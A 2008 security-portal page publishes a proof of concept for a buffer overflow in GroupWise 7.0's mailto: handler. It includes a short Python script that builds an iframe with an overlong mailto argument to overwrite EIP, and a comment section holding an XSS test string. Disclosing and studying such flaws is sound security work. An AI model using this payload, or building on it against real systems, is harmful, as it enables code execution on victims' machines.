Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

advertise with us

add your link here only ($10/month)

Google PageRank Checker
 

Recommended Links

Most downloaded

Latest Comments

alert('XSS BUG Founded..')
There are survivor businesses amidst financial crisis. Just like in other country, in which some bus...
Hex Bolt, Hex Bolt Supplier, Hex Bolt Manufacture, hex, bolt, Windsor Hex Bolt, Hex Bolt, India Hex ...
we are exporter and supplier of gererator, we are supplyig of all kinds of generator
we are manufactrer and supplier of generators, air cooled,small, big, silent, all kind of generator ...
Democratic Representative Mike Kernell’s son, David Kernell, was caught by authorities. Apparently...
On October 5, 2008, the CW Network premiered a new drama from the creators of The Sopranos. The new ...
As of version 1.1.4, this issue has been solved. The script now includes the necessary file using an...
Free Laptop gift - Buy latest mobile phones on best contract deals & get free laptop in UK
thanks smiley

Who's Online

Total: 3
Members: 0 / Guests: 3
No members online

Packet Storm

Packet Storm Last 10 Exploits
Packet Storm Last 10 Advisories
Packet Storm Last 10 Tools
Packet Storm Last 10 Miscellaneous Files
Packet Storm Headlines

Links

viralcoders

lzer
Visits today: 702
Visits yesterday: 828
Visits month: 5227
Visits total: 168431
Pages total: 2254566
GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC Print E-mail
0
Monday, 28 April 2008

GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC
Author: Juan Yacubian
Date: 2008-04-28
Download: exploits , vulnerabilities , articles , GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC 

PRODUCT: GroupWise 7.0
OS: Windows Xp
 
The scheme "mailto" is vulnerable if one takes as default mail client to 
GroupWise, the fault is to implement the scheme followed by an extensive 
argument and this causes the buffer overflow. This brings the consequence that 
can overwrite the EIP and is able to execute arbitrary code. The result with a 
debbuger us what reveals. 
 
Access violation when executing [41414141] 
 
What power is that vulnerability to attach a html file which is included in an 
iframe with the scheme badly formed runs only watch.
 
proof of concept
 
#!/usr/bin/python
 
a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"
 
file = open("test.html", "w")
file.write(a)
file.close()
 
greetings!
 
Juan Pablo Lopez Yacubian
 

Set as favorite
Bookmark
Email This
Hits: 235
Comments (0)add
Write comment
quote
bold
italicize
underline
strike
url
image
quote
quote
smile
wink
laugh
grin
angry
sad
shocked
cool
tongue
kiss
cry
smaller | bigger

busy
 
< Prev   Next >
[ Back ]

Polls

How do you rate the SecuMania Security Portal?
 

Latest exploits

Latest vulnerabilities

Security

Spam

Viruses/Malware

Software/Programming

Linux

Microsoft

Technology

Guitar Lessons | Upvc Doors | Credit Card Consolidation | Loans | Internet Advertisinglinks VoteThisMovie PalKeys Hey3arab arabekia